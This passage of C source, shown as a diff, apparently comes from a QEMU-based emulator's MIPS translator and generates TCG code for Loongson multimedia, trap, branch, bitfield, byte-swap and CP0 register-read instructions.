LMI_HELPER(PCMPEQB, pcmpeqb); + LMI_HELPER(PCMPGTB, pcmpgtb); + + LMI_HELPER(PSLLW, psllw); + LMI_HELPER(PSLLH, psllh); + LMI_HELPER(PSRLW, psrlw); + LMI_HELPER(PSRLH, psrlh); + LMI_HELPER(PSRAW, psraw); + LMI_HELPER(PSRAH, psrah); + + LMI_HELPER(PMULLH, pmullh); + LMI_HELPER(PMULHH, pmulhh); + LMI_HELPER(PMULHUH, pmulhuh); + LMI_HELPER(PMADDHW, pmaddhw); + + LMI_HELPER(PASUBUB, pasubub); + LMI_HELPER_1(BIADD, biadd); + LMI_HELPER_1(PMOVMSKB, pmovmskb); + + LMI_DIRECT(PADDD, paddd, add); + LMI_DIRECT(PSUBD, psubd, sub); + LMI_DIRECT(XOR_CP2, xor, xor); + LMI_DIRECT(NOR_CP2, nor, nor); + LMI_DIRECT(AND_CP2, and, and); + LMI_DIRECT(PANDN, pandn, andc); + LMI_DIRECT(OR, or, or); + + case OPC_PINSRH_0: + tcg_gen_deposit_i64(tcg_ctx, t0, t0, t1, 0, 16); + opn = "pinsrh_0"; + break; + case OPC_PINSRH_1: + tcg_gen_deposit_i64(tcg_ctx, t0, t0, t1, 16, 16); + opn = "pinsrh_1"; + break; + case OPC_PINSRH_2: + tcg_gen_deposit_i64(tcg_ctx, t0, t0, t1, 32, 16); + opn = "pinsrh_2"; + break; + case OPC_PINSRH_3: + tcg_gen_deposit_i64(tcg_ctx, t0, t0, t1, 48, 16); + opn = "pinsrh_3"; + break; + + case OPC_PEXTRH: + tcg_gen_andi_i64(tcg_ctx, t1, t1, 3); + tcg_gen_shli_i64(tcg_ctx, t1, t1, 4); + tcg_gen_shr_i64(tcg_ctx, t0, t0, t1); + tcg_gen_ext16u_i64(tcg_ctx, t0, t0); + opn = "pextrh"; + break; + + case OPC_ADDU_CP2: + tcg_gen_add_i64(tcg_ctx, t0, t0, t1); + tcg_gen_ext32s_i64(tcg_ctx, t0, t0); + opn = "addu"; + break; + case OPC_SUBU_CP2: + tcg_gen_sub_i64(tcg_ctx, t0, t0, t1); + tcg_gen_ext32s_i64(tcg_ctx, t0, t0); + opn = "addu"; + break; + + case OPC_SLL_CP2: + opn = "sll"; + shift_max = 32; + goto do_shift; + case OPC_SRL_CP2: + opn = "srl"; + shift_max = 32; + goto do_shift; + case OPC_SRA_CP2: + opn = "sra"; + shift_max = 32; + goto do_shift; + case OPC_DSLL_CP2: + opn = "dsll"; + shift_max = 64; + goto do_shift; + case OPC_DSRL_CP2: + opn = "dsrl"; + shift_max = 64; + goto do_shift; + case OPC_DSRA_CP2: + opn = "dsra"; + shift_max = 64; + goto do_shift; + do_shift: + /* 
Make sure shift count isn't TCG undefined behaviour. */ + tcg_gen_andi_i64(tcg_ctx, t1, t1, shift_max - 1); + + switch (opc) { + case OPC_SLL_CP2: + case OPC_DSLL_CP2: + tcg_gen_shl_i64(tcg_ctx, t0, t0, t1); + break; + case OPC_SRA_CP2: + case OPC_DSRA_CP2: + /* Since SRA is UndefinedResult without sign-extended inputs, + we can treat SRA and DSRA the same. */ + tcg_gen_sar_i64(tcg_ctx, t0, t0, t1); + break; + case OPC_SRL_CP2: + /* We want to shift in zeros for SRL; zero-extend first. */ + tcg_gen_ext32u_i64(tcg_ctx, t0, t0); + /* FALLTHRU */ + case OPC_DSRL_CP2: + tcg_gen_shr_i64(tcg_ctx, t0, t0, t1); + break; + } + + if (shift_max == 32) { + tcg_gen_ext32s_i64(tcg_ctx, t0, t0); + } + + /* Shifts larger than MAX produce zero. */ + tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_LTU, t1, t1, shift_max); + tcg_gen_neg_i64(tcg_ctx, t1, t1); + tcg_gen_and_i64(tcg_ctx, t0, t0, t1); + break; + + case OPC_ADD_CP2: + case OPC_DADD_CP2: + { + TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); + int lab = gen_new_label(tcg_ctx); + + tcg_gen_mov_i64(tcg_ctx, t2, t0); + tcg_gen_add_i64(tcg_ctx, t0, t1, t2); + if (opc == OPC_ADD_CP2) { + tcg_gen_ext32s_i64(tcg_ctx, t0, t0); + } + tcg_gen_xor_i64(tcg_ctx, t1, t1, t2); + tcg_gen_xor_i64(tcg_ctx, t2, t2, t0); + tcg_gen_andc_i64(tcg_ctx, t1, t2, t1); + tcg_temp_free_i64(tcg_ctx, t2); + tcg_gen_brcondi_i64(tcg_ctx, TCG_COND_GE, t1, 0, lab); + generate_exception(ctx, EXCP_OVERFLOW); + gen_set_label(tcg_ctx, lab); + + opn = (opc == OPC_ADD_CP2 ? 
"add" : "dadd"); + break; + } + + case OPC_SUB_CP2: + case OPC_DSUB_CP2: + { + TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); + int lab = gen_new_label(tcg_ctx); + + tcg_gen_mov_i64(tcg_ctx, t2, t0); + tcg_gen_sub_i64(tcg_ctx, t0, t1, t2); + if (opc == OPC_SUB_CP2) { + tcg_gen_ext32s_i64(tcg_ctx, t0, t0); + } + tcg_gen_xor_i64(tcg_ctx, t1, t1, t2); + tcg_gen_xor_i64(tcg_ctx, t2, t2, t0); + tcg_gen_and_i64(tcg_ctx, t1, t1, t2); + tcg_temp_free_i64(tcg_ctx, t2); + tcg_gen_brcondi_i64(tcg_ctx, TCG_COND_GE, t1, 0, lab); + generate_exception(ctx, EXCP_OVERFLOW); + gen_set_label(tcg_ctx, lab); + + opn = (opc == OPC_SUB_CP2 ? "sub" : "dsub"); + break; + } + + case OPC_PMULUW: + tcg_gen_ext32u_i64(tcg_ctx, t0, t0); + tcg_gen_ext32u_i64(tcg_ctx, t1, t1); + tcg_gen_mul_i64(tcg_ctx, t0, t0, t1); + opn = "pmuluw"; + break; + + case OPC_SEQU_CP2: + case OPC_SEQ_CP2: + case OPC_SLTU_CP2: + case OPC_SLT_CP2: + case OPC_SLEU_CP2: + case OPC_SLE_CP2: + /* ??? Document is unclear: Set FCC[CC]. Does that mean the + FD field is the CC field? 
*/ + default: + MIPS_INVAL(opn); + generate_exception(ctx, EXCP_RI); + return; + } + +#undef LMI_HELPER +#undef LMI_DIRECT + + gen_store_fpr64(ctx, t0, rd); + + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %s, %s", opn, + fregnames[rd], fregnames[rs], fregnames[rt]); + tcg_temp_free_i64(tcg_ctx, t0); + tcg_temp_free_i64(tcg_ctx, t1); +} + +/* Traps */ +static void gen_trap (DisasContext *ctx, uint32_t opc, + int rs, int rt, int16_t imm) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + int cond; + TCGv t0 = tcg_temp_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + + cond = 0; + /* Load needed operands */ + switch (opc) { + case OPC_TEQ: + case OPC_TGE: + case OPC_TGEU: + case OPC_TLT: + case OPC_TLTU: + case OPC_TNE: + /* Compare two registers */ + if (rs != rt) { + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + cond = 1; + } + break; + case OPC_TEQI: + case OPC_TGEI: + case OPC_TGEIU: + case OPC_TLTI: + case OPC_TLTIU: + case OPC_TNEI: + /* Compare register to immediate */ + if (rs != 0 || imm != 0) { + gen_load_gpr(ctx, t0, rs); + tcg_gen_movi_tl(tcg_ctx, t1, (int32_t)imm); + cond = 1; + } + break; + } + if (cond == 0) { + switch (opc) { + case OPC_TEQ: /* rs == rs */ + case OPC_TEQI: /* r0 == 0 */ + case OPC_TGE: /* rs >= rs */ + case OPC_TGEI: /* r0 >= 0 */ + case OPC_TGEU: /* rs >= rs unsigned */ + case OPC_TGEIU: /* r0 >= 0 unsigned */ + /* Always trap */ + generate_exception(ctx, EXCP_TRAP); + break; + case OPC_TLT: /* rs < rs */ + case OPC_TLTI: /* r0 < 0 */ + case OPC_TLTU: /* rs < rs unsigned */ + case OPC_TLTIU: /* r0 < 0 unsigned */ + case OPC_TNE: /* rs != rs */ + case OPC_TNEI: /* r0 != 0 */ + /* Never trap: treat as NOP. 
*/ + break; + } + } else { + int l1 = gen_new_label(tcg_ctx); + + switch (opc) { + case OPC_TEQ: + case OPC_TEQI: + tcg_gen_brcond_tl(tcg_ctx, TCG_COND_NE, t0, t1, l1); + break; + case OPC_TGE: + case OPC_TGEI: + tcg_gen_brcond_tl(tcg_ctx, TCG_COND_LT, t0, t1, l1); + break; + case OPC_TGEU: + case OPC_TGEIU: + tcg_gen_brcond_tl(tcg_ctx, TCG_COND_LTU, t0, t1, l1); + break; + case OPC_TLT: + case OPC_TLTI: + tcg_gen_brcond_tl(tcg_ctx, TCG_COND_GE, t0, t1, l1); + break; + case OPC_TLTU: + case OPC_TLTIU: + tcg_gen_brcond_tl(tcg_ctx, TCG_COND_GEU, t0, t1, l1); + break; + case OPC_TNE: + case OPC_TNEI: + tcg_gen_brcond_tl(tcg_ctx, TCG_COND_EQ, t0, t1, l1); + break; + } + generate_exception(ctx, EXCP_TRAP); + gen_set_label(tcg_ctx, l1); + } + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +static inline void gen_goto_tb(DisasContext *ctx, int n, target_ulong dest) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TranslationBlock *tb; + tb = ctx->tb; + if ((tb->pc & TARGET_PAGE_MASK) == (dest & TARGET_PAGE_MASK) && + likely(!ctx->singlestep_enabled)) { + tcg_gen_goto_tb(tcg_ctx, n); + gen_save_pc(ctx, dest); + tcg_gen_exit_tb(tcg_ctx, (uintptr_t)tb + n); + } else { + gen_save_pc(ctx, dest); + if (ctx->singlestep_enabled) { + save_cpu_state(ctx, 0); + gen_helper_0e0i(tcg_ctx, raise_exception, EXCP_DEBUG); + } + tcg_gen_exit_tb(tcg_ctx, 0); + } +} + +/* Branches (before delay slot) */ +static void gen_compute_branch (DisasContext *ctx, uint32_t opc, + int insn_bytes, + int rs, int rt, int32_t offset, + int delayslot_size) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + target_ulong btgt = -1; + int blink = 0; + int bcond_compute = 0; + TCGv t0 = tcg_temp_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + + if (ctx->hflags & MIPS_HFLAG_BMASK) { +#ifdef MIPS_DEBUG_DISAS + LOG_DISAS("Branch in delay / forbidden slot at PC 0x" + TARGET_FMT_lx "\n", ctx->pc); +#endif + generate_exception(ctx, EXCP_RI); + goto out; + } + 
+ /* Load needed operands */ + switch (opc) { + case OPC_BEQ: + case OPC_BEQL: + case OPC_BNE: + case OPC_BNEL: + /* Compare two registers */ + if (rs != rt) { + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + bcond_compute = 1; + } + btgt = ctx->pc + insn_bytes + offset; + break; + case OPC_BGEZ: + case OPC_BGEZAL: + case OPC_BGEZALL: + case OPC_BGEZL: + case OPC_BGTZ: + case OPC_BGTZL: + case OPC_BLEZ: + case OPC_BLEZL: + case OPC_BLTZ: + case OPC_BLTZAL: + case OPC_BLTZALL: + case OPC_BLTZL: + /* Compare to zero */ + if (rs != 0) { + gen_load_gpr(ctx, t0, rs); + bcond_compute = 1; + } + btgt = ctx->pc + insn_bytes + offset; + break; + case OPC_BPOSGE32: +#if defined(TARGET_MIPS64) + case OPC_BPOSGE64: + tcg_gen_andi_tl(tcg_ctx, t0, *(TCGv *)tcg_ctx->cpu_dspctrl, 0x7F); +#else + tcg_gen_andi_tl(tcg_ctx, t0, *(TCGv *)tcg_ctx->cpu_dspctrl, 0x3F); +#endif + bcond_compute = 1; + btgt = ctx->pc + insn_bytes + offset; + break; + case OPC_J: + case OPC_JAL: + case OPC_JALX: + /* Jump to immediate */ + btgt = ((ctx->pc + insn_bytes) & (int32_t)0xF0000000) | (uint32_t)offset; + break; + case OPC_JR: + case OPC_JALR: + /* Jump to register */ + if (offset != 0 && offset != 16) { + /* Hint = 0 is JR/JALR, hint 16 is JR.HB/JALR.HB, the + others are reserved. 
*/ + MIPS_INVAL("jump hint"); + generate_exception(ctx, EXCP_RI); + goto out; + } + gen_load_gpr(ctx, *(TCGv *)tcg_ctx->btarget, rs); + break; + default: + MIPS_INVAL("branch/jump"); + generate_exception(ctx, EXCP_RI); + goto out; + } + if (bcond_compute == 0) { + /* No condition to be computed */ + switch (opc) { + case OPC_BEQ: /* rx == rx */ + case OPC_BEQL: /* rx == rx likely */ + case OPC_BGEZ: /* 0 >= 0 */ + case OPC_BGEZL: /* 0 >= 0 likely */ + case OPC_BLEZ: /* 0 <= 0 */ + case OPC_BLEZL: /* 0 <= 0 likely */ + /* Always take */ + ctx->hflags |= MIPS_HFLAG_B; + MIPS_DEBUG("balways"); + break; + case OPC_BGEZAL: /* 0 >= 0 */ + case OPC_BGEZALL: /* 0 >= 0 likely */ + /* Always take and link */ + blink = 31; + ctx->hflags |= MIPS_HFLAG_B; + MIPS_DEBUG("balways and link"); + break; + case OPC_BNE: /* rx != rx */ + case OPC_BGTZ: /* 0 > 0 */ + case OPC_BLTZ: /* 0 < 0 */ + /* Treat as NOP. */ + MIPS_DEBUG("bnever (NOP)"); + goto out; + case OPC_BLTZAL: /* 0 < 0 */ + /* Handle as an unconditional branch to get correct delay + slot checking. 
*/ + blink = 31; + btgt = ctx->pc + insn_bytes + delayslot_size; + ctx->hflags |= MIPS_HFLAG_B; + MIPS_DEBUG("bnever and link"); + break; + case OPC_BLTZALL: /* 0 < 0 likely */ + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[31], ctx->pc + 8); + /* Skip the instruction in the delay slot */ + MIPS_DEBUG("bnever, link and skip"); + ctx->pc += 4; + goto out; + case OPC_BNEL: /* rx != rx likely */ + case OPC_BGTZL: /* 0 > 0 likely */ + case OPC_BLTZL: /* 0 < 0 likely */ + /* Skip the instruction in the delay slot */ + MIPS_DEBUG("bnever and skip"); + ctx->pc += 4; + goto out; + case OPC_J: + ctx->hflags |= MIPS_HFLAG_B; + MIPS_DEBUG("j " TARGET_FMT_lx, btgt); + break; + case OPC_JALX: + ctx->hflags |= MIPS_HFLAG_BX; + /* Fallthrough */ + case OPC_JAL: + blink = 31; + ctx->hflags |= MIPS_HFLAG_B; + MIPS_DEBUG("jal " TARGET_FMT_lx, btgt); + break; + case OPC_JR: + ctx->hflags |= MIPS_HFLAG_BR; + MIPS_DEBUG("jr %s", regnames[rs]); + break; + case OPC_JALR: + blink = rt; + ctx->hflags |= MIPS_HFLAG_BR; + MIPS_DEBUG("jalr %s, %s", regnames[rt], regnames[rs]); + break; + default: + MIPS_INVAL("branch/jump"); + generate_exception(ctx, EXCP_RI); + goto out; + } + } else { + switch (opc) { + case OPC_BEQ: + tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, *(TCGv *)tcg_ctx->bcond, t0, t1); + MIPS_DEBUG("beq %s, %s, " TARGET_FMT_lx, + regnames[rs], regnames[rt], btgt); + goto not_likely; + case OPC_BEQL: + tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, *(TCGv *)tcg_ctx->bcond, t0, t1); + MIPS_DEBUG("beql %s, %s, " TARGET_FMT_lx, + regnames[rs], regnames[rt], btgt); + goto likely; + case OPC_BNE: + tcg_gen_setcond_tl(tcg_ctx, TCG_COND_NE, *(TCGv *)tcg_ctx->bcond, t0, t1); + MIPS_DEBUG("bne %s, %s, " TARGET_FMT_lx, + regnames[rs], regnames[rt], btgt); + goto not_likely; + case OPC_BNEL: + tcg_gen_setcond_tl(tcg_ctx, TCG_COND_NE, *(TCGv *)tcg_ctx->bcond, t0, t1); + MIPS_DEBUG("bnel %s, %s, " TARGET_FMT_lx, + regnames[rs], regnames[rt], btgt); + goto likely; + case OPC_BGEZ: + tcg_gen_setcondi_tl(tcg_ctx, 
TCG_COND_GE, *(TCGv *)tcg_ctx->bcond, t0, 0); + MIPS_DEBUG("bgez %s, " TARGET_FMT_lx, regnames[rs], btgt); + goto not_likely; + case OPC_BGEZL: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, *(TCGv *)tcg_ctx->bcond, t0, 0); + MIPS_DEBUG("bgezl %s, " TARGET_FMT_lx, regnames[rs], btgt); + goto likely; + case OPC_BGEZAL: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, *(TCGv *)tcg_ctx->bcond, t0, 0); + MIPS_DEBUG("bgezal %s, " TARGET_FMT_lx, regnames[rs], btgt); + blink = 31; + goto not_likely; + case OPC_BGEZALL: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, *(TCGv *)tcg_ctx->bcond, t0, 0); + blink = 31; + MIPS_DEBUG("bgezall %s, " TARGET_FMT_lx, regnames[rs], btgt); + goto likely; + case OPC_BGTZ: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GT, *(TCGv *)tcg_ctx->bcond, t0, 0); + MIPS_DEBUG("bgtz %s, " TARGET_FMT_lx, regnames[rs], btgt); + goto not_likely; + case OPC_BGTZL: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GT, *(TCGv *)tcg_ctx->bcond, t0, 0); + MIPS_DEBUG("bgtzl %s, " TARGET_FMT_lx, regnames[rs], btgt); + goto likely; + case OPC_BLEZ: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LE, *(TCGv *)tcg_ctx->bcond, t0, 0); + MIPS_DEBUG("blez %s, " TARGET_FMT_lx, regnames[rs], btgt); + goto not_likely; + case OPC_BLEZL: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LE, *(TCGv *)tcg_ctx->bcond, t0, 0); + MIPS_DEBUG("blezl %s, " TARGET_FMT_lx, regnames[rs], btgt); + goto likely; + case OPC_BLTZ: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, *(TCGv *)tcg_ctx->bcond, t0, 0); + MIPS_DEBUG("bltz %s, " TARGET_FMT_lx, regnames[rs], btgt); + goto not_likely; + case OPC_BLTZL: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, *(TCGv *)tcg_ctx->bcond, t0, 0); + MIPS_DEBUG("bltzl %s, " TARGET_FMT_lx, regnames[rs], btgt); + goto likely; + case OPC_BPOSGE32: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, *(TCGv *)tcg_ctx->bcond, t0, 32); + MIPS_DEBUG("bposge32 " TARGET_FMT_lx, btgt); + goto not_likely; +#if defined(TARGET_MIPS64) + case OPC_BPOSGE64: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, *(TCGv 
*)tcg_ctx->bcond, t0, 64); + MIPS_DEBUG("bposge64 " TARGET_FMT_lx, btgt); + goto not_likely; +#endif + case OPC_BLTZAL: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, *(TCGv *)tcg_ctx->bcond, t0, 0); + blink = 31; + MIPS_DEBUG("bltzal %s, " TARGET_FMT_lx, regnames[rs], btgt); + not_likely: + ctx->hflags |= MIPS_HFLAG_BC; + break; + case OPC_BLTZALL: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, *(TCGv *)tcg_ctx->bcond, t0, 0); + blink = 31; + MIPS_DEBUG("bltzall %s, " TARGET_FMT_lx, regnames[rs], btgt); + likely: + ctx->hflags |= MIPS_HFLAG_BL; + break; + default: + MIPS_INVAL("conditional branch/jump"); + generate_exception(ctx, EXCP_RI); + goto out; + } + } + MIPS_DEBUG("enter ds: link %d cond %02x target " TARGET_FMT_lx, + blink, ctx->hflags, btgt); + + ctx->btarget = btgt; + + switch (delayslot_size) { + case 2: + ctx->hflags |= MIPS_HFLAG_BDS16; + break; + case 4: + ctx->hflags |= MIPS_HFLAG_BDS32; + break; + } + + if (blink > 0) { + int post_delay = insn_bytes + delayslot_size; + int lowbit = !!(ctx->hflags & MIPS_HFLAG_M16); + + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[blink], ctx->pc + post_delay + lowbit); + } + + out: + if (insn_bytes == 2) + ctx->hflags |= MIPS_HFLAG_B16; + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +/* special3 bitfield operations */ +static void gen_bitops (DisasContext *ctx, uint32_t opc, int rt, + int rs, int lsb, int msb) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, t1, rs); + switch (opc) { + case OPC_EXT: + if (lsb + msb > 31) + goto fail; + tcg_gen_shri_tl(tcg_ctx, t0, t1, lsb); + if (msb != 31) { + tcg_gen_andi_tl(tcg_ctx, t0, t0, (1U << (msb + 1)) - 1); + } else { + tcg_gen_ext32s_tl(tcg_ctx, t0, t0); + } + break; +#if defined(TARGET_MIPS64) + case OPC_DEXTM: + tcg_gen_shri_tl(tcg_ctx, t0, t1, lsb); + if (msb != 31) { + tcg_gen_andi_tl(tcg_ctx, t0, t0, (1ULL << (msb + 1 + 32)) - 1); + } + break; + case OPC_DEXTU: + 
tcg_gen_shri_tl(tcg_ctx, t0, t1, lsb + 32); + tcg_gen_andi_tl(tcg_ctx, t0, t0, (1ULL << (msb + 1)) - 1); + break; + case OPC_DEXT: + tcg_gen_shri_tl(tcg_ctx, t0, t1, lsb); + tcg_gen_andi_tl(tcg_ctx, t0, t0, (1ULL << (msb + 1)) - 1); + break; +#endif + case OPC_INS: + if (lsb > msb) + goto fail; + gen_load_gpr(ctx, t0, rt); + tcg_gen_deposit_tl(tcg_ctx, t0, t0, t1, lsb, msb - lsb + 1); + tcg_gen_ext32s_tl(tcg_ctx, t0, t0); + break; +#if defined(TARGET_MIPS64) + case OPC_DINSM: + gen_load_gpr(ctx, t0, rt); + tcg_gen_deposit_tl(tcg_ctx, t0, t0, t1, lsb, msb + 32 - lsb + 1); + break; + case OPC_DINSU: + gen_load_gpr(ctx, t0, rt); + tcg_gen_deposit_tl(tcg_ctx, t0, t0, t1, lsb + 32, msb - lsb + 1); + break; + case OPC_DINS: + gen_load_gpr(ctx, t0, rt); + tcg_gen_deposit_tl(tcg_ctx, t0, t0, t1, lsb, msb - lsb + 1); + break; +#endif + default: +fail: + MIPS_INVAL("bitops"); + generate_exception(ctx, EXCP_RI); + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); + return; + } + gen_store_gpr(tcg_ctx, t0, rt); + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +static void gen_bshfl (DisasContext *ctx, uint32_t op2, int rt, int rd) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + TCGv t0; + + if (rd == 0) { + /* If no destination, treat it as a NOP. 
*/ + MIPS_DEBUG("NOP"); + return; + } + + t0 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t0, rt); + switch (op2) { + case OPC_WSBH: + { + TCGv t1 = tcg_temp_new(tcg_ctx); + + tcg_gen_shri_tl(tcg_ctx, t1, t0, 8); + tcg_gen_andi_tl(tcg_ctx, t1, t1, 0x00FF00FF); + tcg_gen_shli_tl(tcg_ctx, t0, t0, 8); + tcg_gen_andi_tl(tcg_ctx, t0, t0, ~0x00FF00FF); + tcg_gen_or_tl(tcg_ctx, t0, t0, t1); + tcg_temp_free(tcg_ctx, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], t0); + } + break; + case OPC_SEB: + tcg_gen_ext8s_tl(tcg_ctx, *cpu_gpr[rd], t0); + break; + case OPC_SEH: + tcg_gen_ext16s_tl(tcg_ctx, *cpu_gpr[rd], t0); + break; +#if defined(TARGET_MIPS64) + case OPC_DSBH: + { + TCGv t1 = tcg_temp_new(tcg_ctx); + + tcg_gen_shri_tl(tcg_ctx, t1, t0, 8); + tcg_gen_andi_tl(tcg_ctx, t1, t1, 0x00FF00FF00FF00FFULL); + tcg_gen_shli_tl(tcg_ctx, t0, t0, 8); + tcg_gen_andi_tl(tcg_ctx, t0, t0, ~0x00FF00FF00FF00FFULL); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_temp_free(tcg_ctx, t1); + } + break; + case OPC_DSHD: + { + TCGv t1 = tcg_temp_new(tcg_ctx); + + tcg_gen_shri_tl(tcg_ctx, t1, t0, 16); + tcg_gen_andi_tl(tcg_ctx, t1, t1, 0x0000FFFF0000FFFFULL); + tcg_gen_shli_tl(tcg_ctx, t0, t0, 16); + tcg_gen_andi_tl(tcg_ctx, t0, t0, ~0x0000FFFF0000FFFFULL); + tcg_gen_or_tl(tcg_ctx, t0, t0, t1); + tcg_gen_shri_tl(tcg_ctx, t1, t0, 32); + tcg_gen_shli_tl(tcg_ctx, t0, t0, 32); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_temp_free(tcg_ctx, t1); + } + break; +#endif + default: + MIPS_INVAL("bsfhl"); + generate_exception(ctx, EXCP_RI); + tcg_temp_free(tcg_ctx, t0); + return; + } + tcg_temp_free(tcg_ctx, t0); +} + +#ifndef CONFIG_USER_ONLY +/* CP0 (MMU and control) */ +static inline void gen_mfc0_load32 (DisasContext *ctx, TCGv arg, target_ulong off) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); + + tcg_gen_ld_i32(tcg_ctx, t0, tcg_ctx->cpu_env, off); + tcg_gen_ext_i32_tl(tcg_ctx, arg, t0); + tcg_temp_free_i32(tcg_ctx, t0); +} + +static inline 
void gen_mfc0_load64 (DisasContext *ctx, TCGv arg, target_ulong off)
{
    /* Load a target_ulong CP0 field and sign-extend its low 32 bits. */
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, off);
    tcg_gen_ext32s_tl(tcg_ctx, arg, arg);
}

/* Store the low 32 bits of 'arg' into the CP0 field at env offset 'off'. */
static inline void gen_mtc0_store32 (DisasContext *ctx, TCGv arg, target_ulong off)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx);

    tcg_gen_trunc_tl_i32(tcg_ctx, tmp, arg);
    tcg_gen_st_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, off);
    tcg_temp_free_i32(tcg_ctx, tmp);
}

/* Sign-extend 'arg' to 32 bits and store it into the CP0 field at 'off'.
   NOTE: clobbers 'arg' (the sign-extension is done in place). */
static inline void gen_mtc0_store64 (DisasContext *ctx, TCGv arg, target_ulong off)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    tcg_gen_ext32s_tl(tcg_ctx, arg, arg);
    tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, off);
}

/* Result of reading an unimplemented CP0 register: 0 on R6, ~0 before R6. */
static inline void gen_mfc0_unimplemented(DisasContext *ctx, TCGv arg)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    if (ctx->insn_flags & ISA_MIPS32R6) {
        tcg_gen_movi_tl(tcg_ctx, arg, 0);
    } else {
        tcg_gen_movi_tl(tcg_ctx, arg, ~0);
    }
}

/* Bail out to the unimplemented path unless condition 'c' holds. */
#define CP0_CHECK(c)                            \
    do {                                        \
        if (!(c)) {                             \
            goto cp0_unimplemented;             \
        }                                       \
    } while (0)

/*
 * MFC0: move from coprocessor 0.  Emits the read of CP0 register
 * (reg, sel) into 'arg'.  Unknown or guarded-off registers fall through
 * to cp0_unimplemented, which substitutes the architected default value.
 */
static void gen_mfc0(DisasContext *ctx, TCGv arg, int reg, int sel)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    const char *rn = "invalid";

    if (sel != 0)
        check_insn(ctx, ISA_MIPS32);

    switch (reg) {
    case 0:
        switch (sel) {
        case 0:
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Index));
            rn = "Index";
            break;
        case 1:
            CP0_CHECK(ctx->insn_flags & ASE_MT);
            gen_helper_mfc0_mvpcontrol(tcg_ctx, arg, tcg_ctx->cpu_env);
            rn = "MVPControl";
            break;
        case 2:
            CP0_CHECK(ctx->insn_flags & ASE_MT);
            gen_helper_mfc0_mvpconf0(tcg_ctx, arg, tcg_ctx->cpu_env);
            rn = "MVPConf0";
            break;
        case 3:
            CP0_CHECK(ctx->insn_flags & ASE_MT);
            gen_helper_mfc0_mvpconf1(tcg_ctx, arg, tcg_ctx->cpu_env);
            rn = "MVPConf1";
            break;
        default:
            goto cp0_unimplemented;
        }
        break;
    case 1:
        switch (sel) {
        case 0:
            /* Random was removed in R6. */
            CP0_CHECK(!(ctx->insn_flags & ISA_MIPS32R6));
            gen_helper_mfc0_random(tcg_ctx, arg, tcg_ctx->cpu_env);
            rn = "Random";
            break;
        case 1:
            CP0_CHECK(ctx->insn_flags & ASE_MT);
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_VPEControl));
            rn = "VPEControl";
            break;
        case 2:
            CP0_CHECK(ctx->insn_flags & ASE_MT);
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_VPEConf0));
            rn = "VPEConf0";
            break;
        case 3:
            CP0_CHECK(ctx->insn_flags & ASE_MT);
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_VPEConf1));
            rn = "VPEConf1";
            break;
        case 4:
            CP0_CHECK(ctx->insn_flags & ASE_MT);
            gen_mfc0_load64(ctx, arg, offsetof(CPUMIPSState, CP0_YQMask));
            rn = "YQMask";
            break;
        case 5:
            CP0_CHECK(ctx->insn_flags & ASE_MT);
